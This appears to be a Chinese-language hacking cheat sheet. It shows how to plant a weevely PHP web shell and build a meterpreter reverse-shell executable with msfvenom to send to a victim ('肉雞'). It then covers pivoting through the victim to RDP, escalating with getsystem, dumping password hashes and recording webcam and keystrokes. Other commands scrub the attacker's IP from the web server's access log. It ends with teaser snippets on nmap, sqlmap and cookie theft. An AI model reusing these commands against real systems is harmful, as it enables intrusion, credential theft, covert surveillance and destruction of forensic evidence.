上傳木馬
windows上一般使用菜刀實現一句話木馬的控制,在linux平台下,也存在類似的工具,如weevely
使用weevely 生成木馬php後上傳後再用其連線
weevely generate test hello.php 生成的檔案在/usr/share/weevely/hello.php
weevely test (weevely url pass)
使用metersploit
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.201.100 lport=6666 -f exe > 6666.exe 生成木馬發給肉雞
主機設定meter指令碼
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.100
set lport 6666
exploit
肉雞上點選該程式,實現連線
以此為跳板:
鏈結乙個埠
portfwd add -l 2222 -r 192.168.201.101 -p 3389
netstat -an | grep "2222" 驗證本地是否開啟了監聽狀態
rdesktop 127.1.1.0:2222 連線上
建立路由
run autoroute -s 192.168.201.101(內網機)
run autoroute -p
getsystem
run hashdump
background 掛起當前會話
接下來可以開始掃瞄相應埠並測試,使用set rhost 192.168.201.101
附meterpreter常用命令:
getsystem #會自動利用各種各樣的系統漏洞來進行許可權提公升
migrate #程序id程序遷移
background #把當前的會話設定為背景,需要的時候在啟用
getuid #檢視對方正在執行的使用者
ps #列出所有的程序
getpid #返回執行meterpreter的id號
sysinfo #產看系統資訊和體系結構
shell #切換到cmd的系統許可權方式
exit #退出shell會話返回meterpreter或終止meterpreter
getdesktop 擷取目標主機當前桌面會話視窗
run webcam -p /var/www #在/var/www目錄監控目標主機的攝像頭
keylog_recorder #使用migrate將會話遷移至explorer.exe的程序空間後記錄鍵盤
觀察日誌資訊
cd /opt/lampp/logs
grep access.log -v 我們的ip -output cleaned.log 過濾網路行為
rm access.log
cp cleaned.log access.log
rm cleaned.log
其他linux下臨時設定ip:ifconfig eth0 192.168.201.100 重啟後失效
滲透工具之nmap使用
一.簡介 nmap是乙個網路連線端掃瞄軟體,用來掃瞄網上電腦開放的網路連線端。確定哪些服務執行在哪些連線端,並且推斷計算機執行哪個作業系統 這是亦稱 fingerprinting 它是網路管理員必用的軟體之一,以及用以評估網路系統安全。二.功能 1.主機發現 掃瞄單個主機 nmap 192.168....
Web滲透工具之 sqlmap的簡單應用
python sqlmap.py開頭的是在windows中執行sqlmap時使用的 sqlmap開頭的是在kali中執行sqlmap時使用的 判斷是否存在注入 python sqlmap.py u sqlmap u 注入點後面的引數大於等於2個時 python sqlmap.py u uid 2 s...
簡單滲透實戰
1.首先在自己的機器上構建web站點 49.232.106.183 6789是我的對映的內網機器web站點 用來接收竊取到的使用者cookie 這裡記得給乙個寫入許可權從而可以成功寫入cookie.txt當中。2.構建惡意url,這裡注意可以將構建的url進行加密 burpsuite或者harbar...